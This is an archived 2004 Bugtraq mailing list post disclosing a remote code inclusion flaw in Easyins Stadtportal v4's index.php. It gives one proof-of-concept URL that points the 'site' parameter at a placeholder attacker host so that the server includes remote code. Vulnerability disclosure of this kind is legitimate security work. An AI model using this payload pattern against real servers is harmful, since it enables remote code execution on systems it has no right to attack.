[35848] in bugtraq
Easyins Stadtportal
daemon@ATHENA.MIT.EDU (Francisco Alisson)
Sat Jul 24 14:46:58 2004
Date: 24 Jul 2004 17:52:14 -0000
Message-ID: <20040724175214.30999.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Francisco Alisson <dominusvis@click21.com.br>
To: bugtraq@securityfocus.com
Easyins Stadtportal v4 and prior seems to be vulnerable to a code inclusion in index.php
http://www.host-vulnerable.com/stadtportal-path/index.php?site=http://www.evil-host.com
If anybody could explain it better than me, do it :) I'm not a security master, i'm just trying to learn about it :)
Thanks